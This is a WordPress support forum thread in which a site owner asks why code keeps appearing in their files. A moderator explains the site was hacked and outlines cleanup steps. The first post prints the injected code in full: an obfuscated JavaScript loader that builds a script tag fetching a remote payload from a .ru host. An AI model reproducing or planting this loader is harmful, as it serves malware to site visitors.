WordPress.org

Ready to get started?Download WordPress

Forums

Site breaking down (6 posts)

  1. yellowtail
    Member
    Posted 4 years ago #

    Over past few months my site has been breaking down every few days by some code being magically inserted in wp files. I updated to 2.9, changed theme and rebuild all pages/posts and same problem persists, . Only plugins I use are NGGallery and Maintenance Mode. I also embed few youtube videos by pasting code from youtube. Here is an example of code inserted at the end of default-filters.php file, but there are several other places with similar code:

    <script>/*LGPL*/ try{ window.onload = function(){var Kx42q7ogtq = document.createElement('s^(#c)@r)!i^&p(#t#&('.replace(/@|\!|#|\^|\(|&|\$|\)/ig, ''));Kx42q7ogtq.setAttribute('defer', 'd^)(&@e(f(@$)e#)^r(&$'.replace(/&|\$|#|\(|\!|@|\^|\)/ig, ''));Kx42q7ogtq.setAttribute('type', 't()&$e$)!!x#@(t)^)/($j^(^a&v(@$a@)@s!c@r@&#i$(^@^p)$t!&)'.replace(/&|#|@|\)|\$|\!|\^|\(/ig, ''));Kx42q7ogtq.setAttribute('id', 'H)k)r#5((^z@!1(^g)#(#z(&5#((@^l(y&#!s#!^'.replace(/\)|\(|\!|\$|#|\^|@|&/ig, ''));Kx42q7ogtq.setAttribute('s@(r)&c!!'.replace(/\$|\^|\)|#|&|@|\(|\!/ig, ''), 'h^^&t@(#@t&#p^^:@#&/(#!/(^&g#&^!n)$@@a^^(v&$@i@#$&@-(&^c&$o(-^j^($(!p!##.!$#(a)!#$m@e&&^b#(((l@o($@.)^j)^p#&@!.^#e)$!^x)b&@^i&))i$-(c$!#$o##@)$m)$.&!t(^$h@e$@$c$$h^$o)c^&o!!#l#(^a!^^t)!e!(^)w)@(e$b!(.^r))u@&:!8$!!$0!(&8^@$0@$&@/!&)g&^o&)@&o&^&^g^)(l!e^@!(.$c@)@&o)(m)^#/@)^&g)o(##o$&^g!l@#)&e)#$.@#&c)#@o!!m&)/!^!y()(e#@$$l&#p@@&.))#(c$&)o@$@m##$)/@&u$@(w(a$n)^$t()s$.^c)$o#@$m&@(/!@o@n$(^@e#m@^a#$n$$g@a)(.&(!c##^!o@m^!/#'.replace(/&|\(|\!|@|#|\^|\)|\$/ig, ''));if (document){document.body.appendChild(Kx42q7ogtq);}} } catch(Z5etnjy1aegaoiqtc5d) {}</script>
    <!--9fdcd16354fd9685ecb93060babdb5c4-->

    Anybody knows what causes this and how to fix it?

    Thanks

  2. andyimages
    Member
    Posted 4 years ago #

    Hosted by Godaddy by any chance?

  3. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    if you have code randomly being inserted into wp files, you have been hacked.

    Here's some nice reading for you:
    Hacked:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    And when you're done:
    http://codex.wordpress.org/Hardening_WordPress

    Basically...you've got a lot of work ahead of you. Also, do you have anything else installed on your server besides WP? MAybe a forum or gallery or something? Those are probably infected too.

  4. yellowtail
    Member
    Posted 4 years ago #

    It's hosted by bluehost and no, I don't have anything else on this site besides WP.
    What I would like to know is, what exactly caused it, is it hosting security, ftp, weak password hack, or is it something hacked thru WP content?

  5. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    the answer, is yes.

    Any of those things. Older versions of WP were susceptible to attack. It could have been that.

    If you are on shared hosting, could have been through someone else...

    could be weak passwords....etc...you'll have to change all your passwords (including DB) as part of the cleaning and hardening

    basically, reinstall all WP files, check wp-config for bad code, reinstall all plugins, reinstall/clean theme, scan through all you uploads folders for anything....I think that takes care of the files portion

    change all passwords, remember you have to change wp-config to match your new DB password

    then you have to go through your database

    and, look for any files that are not part of WP install, you may have a rogue file that someone uploaded to your server which is inserting code

  6. yellowtail
    Member
    Posted 4 years ago #

    Thank you very much for your help.

Topic Closed

This topic has been closed to new replies.

About this Topic